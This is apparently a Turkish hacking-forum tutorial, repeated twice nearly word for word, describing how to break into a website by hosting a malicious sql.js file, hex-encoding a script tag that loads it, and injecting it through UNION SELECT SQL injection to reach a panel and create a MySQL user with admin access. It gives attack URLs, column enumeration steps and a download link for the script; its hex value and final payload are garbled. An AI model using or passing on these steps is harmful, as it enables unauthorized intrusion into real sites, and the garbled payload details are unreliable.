Selamun Aleyküm arkadaslar. Sizlere hedef sistemimizdeki sql acıgını ve javascript zaafiyetini kullanarak, hedef sistemde kullanıcı olusturup "admin" olmayı göstericem. Hedef site bulamadıgımdan fazla görsel anlatamadım k.bakmayın. . Ama fazlasıyla acık ve net bir sekilde anlatmaya calısacagım.
Arkadaslar öncelikle bir hosting ve domaine ihtiyacımız olacak. Hosting ve domain temin etme konusuna deginmeden JavaScirpt ile nasıl sql injectionu kullanarak hedef sistemde kullanıcı olusturmayı anlatıcam. Hemen verdigim sql.js yi sitemize upload edelim ve kullanıcagımız sitemizin uzantısı bu sekilde olmalı; www.bizimsitemiz.com/sql.js
Daha sonra bu url ye gidiyoruz; http://www.string-functions.com/string-hex.aspx ve
Enter the text to encode to hex, and then click "Convert!": yazan yere
<script scr=’http://www.bizimsitemiz.com/sql.js’></script> yazıp Convert! butonuna tıklıyoruz.
Karsımıza muhtemelen böyle bir harf ve rakam karısımı birsey cıkacak; 3c847483508285318974
Ardından bunu ilerde hedef sitemize encode edecegimiz icin su hale getirelim; concat((0x3c847483508285318974....))
Simdi hedef sitemize gidip klasik manuel sql inj. yapalım; www.hedefsite.com/index.php?id=632+order+by+1-- vs vs seklinde
ve kolon sayımızı bulup (örn: 8 olsun kolon sayımız) union select komutumuzu verelim; www.hedefsite.com/index.php?=632+union+select+1,2,3,4,5,6,7,8-- ve ekranımıza 4 vurdu dersek tarayıcımızın url ekranına girecegimiz komut aynen bu sekilde olmalı; http://www.hedefsite.com/index.php?...x3c847483508285318974....))NRZ.Bozo,5,6,7,8-- ve finale ulasmıs olacagız. Karsımıza shell paneli gibi bir panel cıkacak. En alta inip mysql kısmından kendinize özel kullanıcı adı ve sifre girerek kullanıcı olusturacaksınız gerisi sizlere kalmıs birsey
Arkadaslar bu anlatımım priv8 bir SQL İnjection yönetimidir ve yazılı olarak hiçbir yerde bulabileceginizi zannetmiyorum yada ben hiç rastlamadım. Biraz kısa oldu ama kullanım mantıgını anlamıssınızdır umarım. Anlatım tamamen bana aitdir bu yuzden fazla görsel anlatamıyorum, hedef sıkıntısıda yasıyorum acıkcası Zaten dediklerimi yaptıgınız takdirde basit bir işlemdir. Kolay gelsin.
sql.js Download Link; http://www.dosya.tc/server14/KX1EXY/sql.rar.html
Arkadaslar öncelikle bir hosting ve domaine ihtiyacımız olacak. Hosting ve domain temin etme konusuna deginmeden JavaScirpt ile nasıl sql injectionu kullanarak hedef sistemde kullanıcı olusturmayı anlatıcam. Hemen verdigim sql.js yi sitemize upload edelim ve kullanıcagımız sitemizin uzantısı bu sekilde olmalı; www.bizimsitemiz.com/sql.js
Daha sonra bu url ye gidiyoruz; http://www.string-functions.com/string-hex.aspx ve
Enter the text to encode to hex, and then click "Convert!": yazan yere
<script scr=’http://www.bizimsitemiz.com/sql.js’></script> yazıp Convert! butonuna tıklıyoruz.
Karsımıza muhtemelen böyle bir harf ve rakam karısımı birsey cıkacak; 3c847483508285318974
Ardından bunu ilerde hedef sitemize encode edecegimiz icin su hale getirelim; concat((0x3c847483508285318974....))
Simdi hedef sitemize gidip klasik manuel sql inj. yapalım; www.hedefsite.com/index.php?id=632+order+by+1-- vs vs seklinde
ve kolon sayımızı bulup (örn: 8 olsun kolon sayımız) union select komutumuzu verelim; www.hedefsite.com/index.php?=632+union+select+1,2,3,4,5,6,7,8-- ve ekranımıza 4 vurdu dersek tarayıcımızın url ekranına girecegimiz komut aynen bu sekilde olmalı; http://www.hedefsite.com/index.php?...x3c847483508285318974....))NRZ.Bozo,5,6,7,8-- ve finale ulasmıs olacagız. Karsımıza shell paneli gibi bir panel cıkacak. En alta inip mysql kısmından kendinize özel kullanıcı adı ve sifre girerek kullanıcı olusturacaksınız gerisi sizlere kalmıs birsey
Arkadaslar bu anlatımım priv8 bir SQL İnjection yönetimidir ve yazılı olarak hiçbir yerde bulabileceginizi zannetmiyorum yada ben hiç rastlamadım. Biraz kısa oldu ama kullanım mantıgını anlamıssınızdır umarım. Anlatım tamamen bana aitdir bu yuzden fazla görsel anlatamıyorum, hedef sıkıntısıda yasıyorum acıkcası
Zaten dediklerimi yaptıgınız takdirde basit bir işlemdir. Kolay gelsin.sql.js Download Link; http://www.dosya.tc/server14/KX1EXY/sql.rar.html
